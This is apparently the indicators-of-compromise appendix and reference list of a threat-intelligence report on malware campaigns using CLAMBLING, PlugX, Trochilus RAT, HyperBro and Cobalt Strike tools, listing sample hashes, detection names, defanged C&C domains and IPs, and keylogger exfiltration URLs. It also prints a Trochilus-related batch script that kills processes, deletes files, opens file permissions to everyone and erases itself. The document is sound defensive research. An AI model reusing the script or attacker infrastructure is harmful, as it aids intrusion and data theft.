Backdoor.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.ENC Trojan.Win32.CLAMBLING.ENC Trojan.Win32.CLAMBLING.ENC Trojan.Win32.CLAMBLING.ENC Backdoor.Win32.CLAMBLING.C Backdoor.Win32.CLAMBLING.C Backdoor.Win32.CLAMBLING.D Backdoor.Win32.CLAMBLING.D|x64 x64 x64 x64 x64 x64 x64 x64 x86 x86 x86 x86 x86 x86 x86 x86 x86 x86 x86 x86 x86 x64 x64 x86 x86 x64 x86 x64 x64| ----- ###### Spear-Phishing Documents **SHA-256** 489310f5f63045a83251c4f457d2baa4b0c57e5ee7b3d147ee63913352a2c7f1 cd651d4e8e5f9587f560a94c0a5ec6283938b906b4831341beb186eec11145cd b4d4dfeb086872500891aa875eb221e8fc95e0c4566a07bc8adda5bd19ab76f3 0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9 9a6da3d7465b7cf6da32f80f2cd9009d7726dfbb128ec0b343fccfcc954de96a ###### Type 0 **SHA-256** 5aee7ae5dd28fcd7e672912292061022c29538bf9264db56b30efdbc8d45abc0 d5e98fb0f05f28183f51a66b0032525ebedc55f056c0ddff2bf15a5eb3016fdd ##### Type 1 backdoor samples ###### Dropper **SHA-256** 0aa627736df73c543c26c3f033f1962282dd005e6a0ec8d9357df3511b2fc8a6 52c02e9d24913761f508b0be1604b357acbe73c65df410b5588eef0e14cf812f d4d8a8cd8da49c7ae974d6774458d6267463eb62e798ced51865e7f88a64969e ###### Type 1 |SHA-256|Trend Micro Pattern Detection| |---|---| |489310f5f63045a83251c4f457d2baa4b0c57e5ee7b3d147ee63913352a2c7f1 cd651d4e8e5f9587f560a94c0a5ec6283938b906b4831341beb186eec11145cd b4d4dfeb086872500891aa875eb221e8fc95e0c4566a07bc8adda5bd19ab76f3 0351c808c016cd5190ea45d5243c6a2c6cd3b5fc4e22571e06b948910e5535f9 9a6da3d7465b7cf6da32f80f2cd9009d7726dfbb128ec0b343fccfcc954de96a|Trojan.W97M.CLAMBLING.A Trojan.W97M.CLAMBLING.A Trojan.W97M.CLAMBLING.A Trojan.W97M.CLAMBLING.A Trojan.W97M.CLAMBLING.B| |SHA-256|Trend Micro Pattern Detection| |---|---| |5aee7ae5dd28fcd7e672912292061022c29538bf9264db56b30efdbc8d45abc0 d5e98fb0f05f28183f51a66b0032525ebedc55f056c0ddff2bf15a5eb3016fdd|Trojan.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.A| |SHA-256|Trend Micro Pattern Detection| |---|---| |0aa627736df73c543c26c3f033f1962282dd005e6a0ec8d9357df3511b2fc8a6 52c02e9d24913761f508b0be1604b357acbe73c65df410b5588eef0e14cf812f d4d8a8cd8da49c7ae974d6774458d6267463eb62e798ced51865e7f88a64969e|Trojan.Win64.CLAMBLING.A Trojan.Win64.CLAMBLING.A Trojan.Win64.CLAMBLING.A| |SHA-256|Trend Micro Pattern Detection| |---|---| |e18af309ecc3bc93351b9fa13a451e8b55b71d9edcc4232bc53eb1092bdfa859 a22815279cac432e5951cec72a0d24a53319e2d85e843e436c8b181ab43979b6 d2f12b1492ab90e61c16d41d79ee3f28a7773656ccf4c3459afedb2bf46cca18 0105718608ae7b8d782ae6e480d685dca1abc2deef29f0241d70de88f6da8dd5 24ebd398be23135a2d8aa7000c2b6a534448b87aa5708b8546089630a8035f7e 96282a625a31b6bf646c6e01ad20de96fd63c345881a9c91190940121580059d 0693713f995285e8bd99ebfca2c4f0f1a8e824dafb5a99693442a9256df06e02 b226c8e85a7b1a6d4d29d42fc84bc7f3a32335fc7ba44b455a7716d706660873 a3d9aac7291e356a64b0892f4ec85f1cdcb3dea71b820917fcd5011fb555989d 9dd1d21e9431cfe25709a8f26ec0f605ed19cf64ca1922e97fad7b7f2d2e82ea 56758c25e3b00957c6f7f76fcea5d0598eff7eda98c63f50b51d1c28f267ac8f|Trojan.Win64.CLAMBLING.A Trojan.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A| ----- |C&C|File path|Service name|Campaign name|Version| |---|---|---|---|---| |www.kkxx888666[.]com:53 www.betwln520[.]com:110 download.safedog[.]co:80 download.safedog[.]co:443 test66.shopingchina[.]net:80 update.google.com.updatesrvers[.]org:80 safe.mircosofdevice[.]com:80 safe.mircosofdevice[.]com:53 safe.mircosofdevice[.]com:5000 office.support.googldevice[.]com:8080 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 office.support.googldevice[.]com:80 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 safe.mircosofdevice[.]com:53 safe.mircosofdevice[.]com:5000 45.77.41[.]49:80 45.77.41[.]49:53 45.77.41[.]49:500 office.support.googldevice[.]com:8080 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 office.support.googldevice[.]com:80 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 office.support.googldevice[.]com:80 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 office.support.googldevice[.]com:80 office.support.googldevice[.]com:53 office.support.googldevice[.]com:5000 35.220.232[.]71:53 35.220.232[.]71:554|%ALLUSERSPROFILE%\Update\ update.exe %ALLUSERSPROFILE%\download\ SKTest.exe %ALLUSERSPROFILE%\S\s.exe %ALLUSERSPROFILE%\google\ GoogleUpdate.exe %ALLUSERSPROFILE%\Microsoft\ DRM\Server\WinDRM.exe %SystemRoot%\system32\sysprep\ RSoPProv.exe %ALLUSERSPROFILE%\Firewall\ Firewall.exe %ALLUSERSPROFILE%\Microsoft\ DRM\Server\WinDRM.exe %SystemRoot%\system32\drivers\ UMDF\RSoPProv.exe C:\Windows\system32\rsoplicy.exe %SystemRoot%\system32\sysprep\ RSoPProv.exe %SystemRoot%\system32\sysprep\ RSoPProv.exe %SystemRoot%\system32\sysprep\ RSoPProv.exe C:\Users\public\Videos\Videos.exe|wuau download googleupdate gupdate WinDRM RSoPProv Firewall WinDRM RSoPProv RSoPProv RSoPProv RSoPProv RSoPProv Videos|N/A N/A 587694 google 123456 123456 123456 123456 123456 123456 123456 123456 123456 google|N/A 1.0 4.0 4.0 8.0 8.0 8.0 8.0 8.0 8.0 8.0 8.0 8.0 9.0| ----- ###### Type 2 backdoor samples **SHA-256** a58946c10c8325040634f7cd04429b9f1e3715767d0c8aec46b7cba8975e6a69 52c147c8eadb58d3580b39c023ce4a90dacce76ee5c30c56c56ea39939a56b52 b5546d4931a0316abd4018c982558ed808b4d0a60233ac18bee601fa09d95ee6 dd0399970d2dbb5ab8b5869e2fafb83194c992f27bbb244adce35e2fe6ef0d28 017a10eebddd3a1aca9b035413906da562331c6d1675efb02bb63bbe13b99165 f80f78972b58ab78b0657c546323538966d9cd828892d4dc07cee6f6d5614f6b 98a0a78219aa7d67865615090d53916c9b4e7d3ea900080c268806c48bb41499 **C&C** update.mircosoftdefender[.]com:8080 update.mircosoftdefender[.]com:30 update.mircosoftdefender[.]com:80 update.mircosoftdefender[.]com:443 store.microsoftbetastore[.]com:443 store.microsoftbetastore[.]com:8080 ###### Type 3 |SHA-256|Names|Trend Micro Pattern Detection| |---|---|---| |a58946c10c8325040634f7cd04429b9f1e3715767d0c8aec46b7cba8975e6a69 52c147c8eadb58d3580b39c023ce4a90dacce76ee5c30c56c56ea39939a56b52 b5546d4931a0316abd4018c982558ed808b4d0a60233ac18bee601fa09d95ee6 dd0399970d2dbb5ab8b5869e2fafb83194c992f27bbb244adce35e2fe6ef0d28 017a10eebddd3a1aca9b035413906da562331c6d1675efb02bb63bbe13b99165 f80f78972b58ab78b0657c546323538966d9cd828892d4dc07cee6f6d5614f6b 98a0a78219aa7d67865615090d53916c9b4e7d3ea900080c268806c48bb41499|goopdate.dll info.cab English.rtf|Trojan.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win64.CLAMBLING.A Backdoor.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.END Trojan.Win32.CLAMBLING.END Backdoor.Win32.CLAMBLING.E| |C&C|File paths|Service names| |---|---|---| |update.mircosoftdefender[.]com:8080 update.mircosoftdefender[.]com:30 update.mircosoftdefender[.]com:80 update.mircosoftdefender[.]com:443 store.microsoftbetastore[.]com:443 store.microsoftbetastore[.]com:8080|%ALLUSERSPROFILE%\DRM\DRM.exe %ALLUSERSPROFILE%\DRM\drm.exe %ALLUSERSPROFILE%\KasperskyLab\Kaspe\Kaspe.exe|WinDRM DRM Kaspe| |SHA-256|Trend Micro Pattern Detection| |---|---| |ee5f7e6ad4a344f40b9babada1654ea22333bb5150cfd26bfc239ead28b6528c ca26a34153972cc73c63d3a9aadd3b12ba35ecdc6e39025b75be56b00c20e0ae 1951c79f280692a43b7c7cafd45c3f5d7f4f841ae104a6cad814fab4641c79f2 d5129308ee83a852e6a320ca68c8e66ed6d1eb4ec584dd0c8b5f313a56c49a15 2fcb7ae3387634fda8f2fa87b7d2eac03660fce49f0732b07d8cf41693801577 8b8735a05ce7dc5f061fc1bd1ca4ad9934da26d8c1d0585db72dfe74115ee6ed|Trojan.Win32.CLAMBLING.A Trojan.Win64.CLAMBLING.A Trojan.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.A Trojan.Win32.CLAMBLING.A Backdoor.Win32.CLAMBLING.D| ----- ###### Dropbox uploader PlugX RAT **SHA-256** 9418c3ac53ed7bec0dea36918c3a1862868b2d8f4e696db509b1ec7aa09bd976 fdf1899eb1457acc2a59b89b0542d53cddcb5553e6fc53ced099473a59fce67c 970388a8256c722e792d26374a3db7c6015a6bab4544c3981fac0d928ef07a12 6655c84e064f744e99fc4d7e50487239604df5f97996eaa8507df7744a8b4de3 www.kkxx88866[.]com www.betwln520[.]com ###### Trochilus RAT |SHA-256|Trend Micro Pattern Detection| |---|---| |a58f2fea8c74c1d25090014c7366db224102daa6c798fcdfb7168b569b7d5ca2 d201e726fd2a2f4b55ea5ca95f0429d74e2efb918c7c136d55ef392ceac854d6 d62ddac7c4aa152cf6f988db6c7bd0c9dcffa2e890d354b7e9db7f3b843fd270 d72c3f5f2f291f7092afd5a0fcaceaf2eaae44d057c9b3b27dd53f2048ed6175 28d2637139231c78a6493cd91e8f0d10891cfeb6c5e758540515faa29f54b6b2 5713907c01db40cf54155db19c0c44c046b2c676a492d5ba13d39118c95139bf 260b64e287d13d04f1f38d956c10d9fdd3cfbff6ba0040a52223fa41605bb975|Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A Trojan.Win32.DBUPLODR.A| |SHA-256|Names|Trend Micro Pattern Detection| |---|---|---| |9418c3ac53ed7bec0dea36918c3a1862868b2d8f4e696db509b1ec7aa09bd976 fdf1899eb1457acc2a59b89b0542d53cddcb5553e6fc53ced099473a59fce67c 970388a8256c722e792d26374a3db7c6015a6bab4544c3981fac0d928ef07a12 6655c84e064f744e99fc4d7e50487239604df5f97996eaa8507df7744a8b4de3|KB3023607.zip Goopdate.dll License.rtf mpsvc.dll|Backdoor.Win32.PLUGX.DUKSS Backdoor.Win32.PLUGX.DUKSS Backdoor.Win32.PLUGX.DUKSS Backdoor.Win32.PLUGX.DUKSY| |SHA-256|Names|Trend Micro Pattern Detection| |---|---|---| |4e3e9e4613d414ba671fd35d7d70d0c3093cd322f5f297281a502420741c03c8 685f372013eb8b5580e603a159c4b68b226b2ae96e00629a567ee0d1ebcc66ec 8c0b0c86a3b055df36304d5421f1003e0e78368e421341d404e25ddf8f5f714b f7ef0e754b004910d40a47ca57b9cf41f63e2a06ba7cc495cb40771a017a8689 c42ccb2c8dc43164db267b68578a3c8869adc4f5062063e7a6b942ecea8c4402 30998c7d7496bf36b70232935b9dd1b0f84a6b7f288417312aab37d2a5dc360e 180640b1e69c48eae468f59c7967df8d3f4dcfd0bb69ce3bbed3663b6ceebc87|diskshawin.exe setup443.exe rpcss.dll rpcss.dll rpcss.dll data.dat|Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A Backdoor.Win32.TROCHIL.A| ----- Batch script related to Trochilus RAT contains the following commands: echo ������� attrib -H -S c:\windows\fonts\system.exe sc delete SESSRV taskkill /f /im system.exe taskkill /f /im system.exe del /f /q c:\windows\fonts\system.exe del /f /q c:\windows\fonts\system.exe del /f /q c:\windows\fonts\run.bat pushd c: md\ProgramData\Microsoft\DeviceSync move /y c:\windows\fonts\diskshawin.exe c:\ProgramData\Microsoft\DeviceSync move /y c:\windows\fonts\diskshawin.exe %allusersprofile%\Microsoft\DeviceSync cacls c:\windows\fonts\clip.exe /e /c /g everyone:f attrib +H +S c:\windows\fonts\clip.exe start csres.exe” del %sfxcmd% del %0 ###### HyperBro **SHA-256** **Name** **Trend Micro Pattern Detection** b823c03be8959b7636997616811ed69b2d611b8505b4f06958c7dc430e3cd681 thumb.dat Backdoor.Win32.HYPERBRO.ENC ###### Winnti googlerenewals[.]net facebooknavigation[.]com ###### MFC keyloggers Malware related to the use of Microsoft Foundation Class (MFC) library captures clipboard and keystroke data and sends the information to two different PHP scripts hosted on the C&C: hxxp://jqb.shopingchina[.]net:88/index.php hxxp://jqb.shopingchina[.]net:88/mobile.php?pw=666 |SHA-256|Name|Trend Micro Pattern Detection| |---|---|---| |b823c03be8959b7636997616811ed69b2d611b8505b4f06958c7dc430e3cd681|thumb.dat|Backdoor.Win32.HYPERBRO.ENC| |SHA-256|Trend Micro Pattern Detection| |---|---| |ae4b9dd3709e4e5e30ce62e7e4075f366f38676e2bad165da3ab4690251e70ae 5da3811c4f15d04444d4c3721e7cc9be106bb1fe2b1bc95c3fe09d991df2a5e8|Trojan.Win32.FLYSTUDIO.D Trojan.Win32.FLYSTUDIO.D| ----- ###### Cobalt Strike Post-exploitation tools |SHA-256|Trend Micro Pattern Detection| |---|---| |91ccf1148f8573a8ef74e9f65c330e8f1f5fe67dc33b99f30e0d3fed69f3d0f0|Trojan.Win32.ROZENA.AM| |SHA-256|Trend Micro Pattern Detection| |---|---| |5b5aff8869ba7f1d3f6ad7711e801b031aedeff287a0dcb8f8ae6d6e4eb468af 412260ab5d9b2b2aa4471b953fb67ddc1a0fe90c353e391819ca7ac1c6d3146f f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd 4c08bc1a2f5384c5306edc6f23e4249526517eb21a88763c8180a582438dfa31 ea45f845eb490991c56946441dce26fe5ecd62ec2b33afe9ba31f4432aa4f1ef 4de1c404a9213a82d9fd1dea04fe097b6d92a1f7fda84481e6dda41d72dc34e5 b5ce4eb3289c6794aecf3625b8c3b2044ddb1be93e538571ca8d5670c6fcf2ed d50debb2bce2d1a425f524a11a80b5dc24ae74a419024782095a0ba981cb483a c6064fb44733b5660557e223598d0e4d5c4448ad20b29e41bef469cb5df77da0 28d19a23d167db3e1282f1c6039bcda6556798be054994a55e60116827dd0bf1 929ff464b5e68b1dc4c5e5b2dc99acae1449a376251da87ab666698499f12ff7 0a6dc8a6868f6882ea9d5998b01ab871746b1ba27641c1b3ff73985878081e93 37286285cb0f8305bd23a693b2e7ace71538e4c0b9f13ee6ca4e9e9419657813 57430caade5b791152f97b18e7037a4274e954ad5fed9b465063d43bde2d08a1 799b7395c9f279d8cd1cd24657788ecb37db7ae03c0dddeb3344a95a551d1325 79928578cdd646a9724bc6851a1ee77820c81a3100788d62885f9d92b6814085 eb8bb1e6b1f832a7009ba441d6365b225324ff582402daebfab83dcbcc55179f 7602e2932a10f3750a5d6236f6c1662047d4475c6e1fe6c57118c6620a083cb3 c425b73be7394032aa8e756259ebf3662c000afaa286c3d7d957891026f3cbb4 b3581e8611f5838fc205f66bc5ca5edddb0fd895e97ebf8f0c7220cb102ae14b e5ee105aa029e3ad4b8f01ef4c78f4c65b623213925e91173488af1a4e15c177 4ccd6555b004ebde29d79c435e4d0191fd7cf607b2d3b7a0c83cb27b3a3b2cbf 24f501141af5bf059509145e165302dd7087b1d1c2136bc5e4403f01435f250e fc865a720cb808354923092bac04ab6a75e20ea92db5a343af07365c0cd2b72a|Trojan.Win64.CVE20170213.AA Trojan.Win32.CVE20170213.AA HKTL_EARTHWRM HackTool.Win32.PWDump.AC HackTool.Win32.PWDump.AC HackTool.Win32.PWDump.AC HackTool.Win32.PWDump.AC HackTool.Win32.PWDump.AC HackTool.Win64.PWDump.B HackTool.Win64.PWDump.B HackTool.Win32.IPScan.AB HackTool.Win32.Nbtscan.AA HackTool.Win64.Mimikatz.AS HackTool.Win64.Mimikatz.AS HackTool.Win32.ClipboardLogger.A HackTool.Win32.BypassUAC.B HackTool.Win32.BypassUAC.B HackTool.Win32.BypassUAC.B HackTool.Win64.BypassUAC.A HackTool.Win64.BypassUAC.A HackTool.Win64.BypassUAC.A Trojan.Win32.Runner.AD Trojan.Win32.RUNNER.AD Trojan.Win32.RUNNER.AD| ----- ###### Other malicious domains and IP addresses update[.]ipv4-cisco[.]com update[.]microsoftdnsdown[.]com update[.]microsoftdnsupdate[.]com cdn[.]kkxx888666[.]com fn[.]shopingchina[.]net support[.]microsoftdnsdown[.]com data[.]dropboxbeta[.]com portal[.]microsoftbetastore[.]com http://www.imr.co[.]kr/upload/info[.]cab 34.92.209[.]216 35.185.166[.]81 35.220.135[.]85 185.173.92[.]141 66.42.60[.]107 104.168.196[.]85 ----- ##### References 1 Daniel Lunghi and Jaromir Horejsi. (10 June 2019). Trend Micro. “MuddyWater Resurfaces, Uses Multi-Stage Backdoor [POWERSTATS V3 and New Post-Exploitation Tools.” Last accessed on 20 January 2020 at https://blog.trendmicro.com/](https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/) [trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-](https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/) [tools/.](https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/) 2 Feike Hacquebord. (12 January 2018). Trend Micro. “Update on Pawn Storm: New Targets and Politically Motivated [Campaigns.” Last accessed on 20 January 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-](https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns) [storm-new-targets-politically-motivated-campaigns/.](https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns) [3 The MITRE Corporation. (n.d.). MITRE ATT&CK. “DLL Side-Loading.” Last accessed on 20 January 2020 at https://attack.](https://attack.mitre.org/techniques/T1073/) [mitre.org/techniques/T1073/.](https://attack.mitre.org/techniques/T1073/) 4 Dwight Hohnstein. (18 April 2019). SpecterOps. “Lateral Movement — SCM and DLL Hijacking Primer.” Last accessed on 20 [January 2020 at https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992.](https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992) 5 Clément Labro. (5 October 2018). GitHub, Inc. “Windows IKEEXT DLL Hijacking Exploit Tool.” Last accessed on 22 January [2020 at https://github.com/itm4n/Ikeext-Privesc.](https://github.com/itm4n/Ikeext-Privesc) 6 ImmuniWeb. (8 October 2012). ImmuniWeb. “Privilege Escalation Vulnerability in Microsoft Windows.” Last accessed on 23 [January 2020 at https://www.immuniweb.com/advisory/HTB23108.](https://www.immuniweb.com/advisory/HTB23108) 7 Lawrence Abrams. (15 November 2016). Bleeping Computer. “CryptoLuck Ransomware being Malvertised via RIG-E Exploit [Kits.” Last accessed on 23 January 2020 at https://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-](https://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/) [malvertised-via-rig-e-exploit-kits/.](https://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/) 8 ThreatRecon Team. (25 July 2019). NSHC RedAlert Labs. “ The Growth of SectorF01 Group’s Cyber Espionage Activities.” [Last accessed on 23 January 2020 at https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-](https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/) [activities/.](https://threatrecon.nshc.net/2019/07/25/growth-of-sectorf01-groups-cyber-espionage-activities/) 9 Microsoft Corporation. (February 2015). Microsoft. “Cumulative Security Update for Internet Explorer 11 for Windows 7 for [x64-based Systems (KB3021952).” Last accessed on 20 January 2020 at https://www.microsoft.com/en-US/download/details.](https://www.microsoft.com/en-US/download/details.aspx?id=45761) [aspx?id=45761.](https://www.microsoft.com/en-US/download/details.aspx?id=45761) 10 Trend Micro. (16 October 2019). Trend Micro Security News. “Winnti Group Resurfaces with PortReuse Backdoor, Now [Engages in Illicit Cryptocurrency Mining.” Last accessed on 20 January 2020 at https://www.trendmicro.com/vinfo/us/security/](https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/winnti-group-resurfaces-with-portreuse-backdoor-now-engages-in-illicit-cryptocurrency-mining) [news/cyber-attacks/winnti-group-resurfaces-with-portreuse-backdoor-now-engages-in-illicit-cryptocurrency-mining.](https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/winnti-group-resurfaces-with-portreuse-backdoor-now-engages-in-illicit-cryptocurrency-mining) [11 The MITRE Corporation. (n.d.). MITRE ATT&CK. “HyperBro.” Last accessed on 20 January 2020 at https://attack.mitre.org/](https://attack.mitre.org/software/S0398/) [software/S0398/.](https://attack.mitre.org/software/S0398/) 12 Robert Falcone. (28 May 2019). Palo Alto Networks, Inc. “Emissary Panda Attacks Middle East Government Sharepoint [Servers.” Last accessed on 20 January 2020 at https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-](https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/) [government-sharepoint-servers/.](https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/) [13 Rootkiter. (3 January 2019). GitHub, Inc. “Tool for tunnel.” Last accessed on 20 January 2020 at https://github.com/rootkiter/](https://github.com/rootkiter/EarthWorm) [EarthWorm.](https://github.com/rootkiter/EarthWorm) [14 My IP. (n.d.). My IP. Last accessed on 20 January 2020 at http://myip.com.tw/.](http://myip.com.tw/) [15 MDSec Research. (7 December 2016). GitHub, Inc. “Invoke-CredHunter.ps1.” Last accessed on 20 January 2020 at https://](https://github.com/mdsecresearch/Publications/blob/master/tools/redteam/psh/Invoke-CredHunter.ps1) [github.com/mdsecresearch/Publications/blob/master/tools/redteam/psh/Invoke-CredHunter.ps1.](https://github.com/mdsecresearch/Publications/blob/master/tools/redteam/psh/Invoke-CredHunter.ps1) [16 SecWiki. (31 July 2017). GitHub, Inc. “CVE-2017-0213.cpp.” Last accessed on 20 January 2020 at https://github.com/SecWiki/](https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp) [windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp.](https://github.com/SecWiki/windows-kernel-exploits/blob/master/CVE-2017-0213/CVE-2017-0213.cpp) [17 BlackYe. (3 May 2014). GitHub, Inc. “ReadPsw.cpp.” Last accesed on 20 January 2020 at https://github.com/blackye/remote_](https://github.com/blackye/remote_control/blob/master/Server/ReadPsw.cpp) [control/blob/master/Server/ReadPsw.cpp.](https://github.com/blackye/remote_control/blob/master/Server/ReadPsw.cpp) [18 Rapid7. (24 July 2017). GitHub, Inc. “ enum_cred_store.rb.” Last accessed on 20 January 2020 at https://github.com/rapid7/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_cred_store.rb) [metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_cred_store.rb.](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_cred_store.rb) 19 Clément Lavoillotte. (15 September 2017). Almond. “UAC bypass via elevated .NET applications.” Last accessed on 20 [January 2020 at https://offsec.provadys.com/UAC-bypass-dotnet.html.](https://offsec.provadys.com/UAC-bypass-dotnet.html) [20 Rapid7. (28 February 2014). GitHub, Inc. “Win7Elevate_Inject.cpp.” Last accessed on 20 January 2020 at https://github.com/](https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp) [rapid7/metasploit-framework/blob/master/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp.](https://github.com/rapid7/metasploit-framework/blob/master/external/source/exploits/bypassuac/Win7Elevate/Win7Elevate_Inject.cpp) ----- 21 Matt Nelson. (15 August 2016). enigma0x3. “’Fileless’ UAC Bypass Using Eventvwr.Exe And Registry Hijacking.” Last accessed [on 20 January 2020 at https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/.](https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/) 22 Russell Nolen, Sarah Miller, and Rico Valdez. (28 April 2016). Carbon Black, Inc. “Threat Advisory: “Squiblydoo” Continues [Trend of Attackers Using Native OS Tools to “Live off the Land”.” Last accessed 20 January 2020 at https://www.carbonblack.](https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/) [com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/.](https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/) 23 Trend Micro. (19 April 2017). Trend Micro. “Of Pigs and Malware: Examining a Possible Member of the Winnti Group.” Last [accessed on 20 January 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-](https://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/) [possible-member-winnti-group/.](https://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/) 24 Tom Hegel. (3 May 2018). 401TRG. “Burning Umbrella: An Intelligence Report on the Winnti Umbrella and Associated State[Sponsored Attackers.” Last accessed on 20 January 2020 at https://401trg.com/burning-umbrella/.](https://401trg.com/burning-umbrella/) 25 ClearSky Research Team. (18 July 2017). ClearSky Cyber Security. “Recent Winnti Infrastructure and Samples.” Last accessed [on 20 January 2020 at https://www.clearskysec.com/winnti/.](https://www.clearskysec.com/winnti/) 26 Denis Legezo. (13 June 2018). AO Kaspersky Lab. “LuckyMouse hits national data center to organize country-level waterholing [campaign.” Last accessed on 20 January 2020 at https://securelist.com/luckymouse-hits-national-data-center/86083/.](https://securelist.com/luckymouse-hits-national-data-center/86083/) 27 Robert Falcone. (28 May 2019). Palo Alto Networks, Inc. “Emissary Panda Attacks Middle East Government Sharepoint [Servers.” Last accessed on 20 January 2020 at https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-](https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/) [government-sharepoint-servers/.](https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/) [28 Trend Micro Incorporated. (n.d.). Trend Micro. “Advanced Threat Protection.” Last accessed on 6 February 2020 at https://](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) [www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html.](https://www.trendmicro.com/en_us/business/products/network/advanced-threat-protection.html) 29 Weimen Wu. (20 February 2015). Trend Micro. “Deploying a Smart Sandbox for Unknown Threats and Zero-Day Attacks.” Last [accessed on 6 February 2020 at https://blog.trendmicro.com/trendlabs-security-intelligence/deploying-a-smart-sandbox-for-](https://blog.trendmicro.com/trendlabs-security-intelligence/deploying-a-smart-sandbox-for-unknown-threats-and-zero-day-attacks/) [unknown-threats-and-zero-day-attacks/.](https://blog.trendmicro.com/trendlabs-security-intelligence/deploying-a-smart-sandbox-for-unknown-threats-and-zero-day-attacks/) 30 Jon Oliver. (12 July 2018). Trend Micro Security News. “Rising Above Spam and Other Threats via Machine Learning.” Last [accessed on 6 February 2020 at https://www.trendmicro.com/vinfo/us/security/news/security-technology/rising-above-spam-](https://www.trendmicro.com/vinfo/us/security/news/security-technology/rising-above-spam-and-other-threats-via-machine-learning) [and-other-threats-via-machine-learning.](https://www.trendmicro.com/vinfo/us/security/news/security-technology/rising-above-spam-and-other-threats-via-machine-learning) [31 Trend Micro Incorporated. (n.d.). Trend Micro. “Smart Protection Suites.” Last accessed on 6 February 2020 at https://www.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [trendmicro.com/en_us/business/products/user-protection/sps.html.](https://www.trendmicro.com/en_us/business/products/user-protection/sps.html) [32 Trend Micro Incorporated. (n.d.). Trend Micro. “Worry-Free Services Advanced.” Last accessed on 6 February 2020 at https://](https://www.trendmicro.com/en_us/small-business/worry-free-services-advanced.html) [www.trendmicro.com/en_us/small-business/worry-free-services-advanced.html.](https://www.trendmicro.com/en_us/small-business/worry-free-services-advanced.html) [33 Trend Micro Incorporated. (n.d.). Trend Micro. “Advanced Threat Protection.” Last accessed on 6 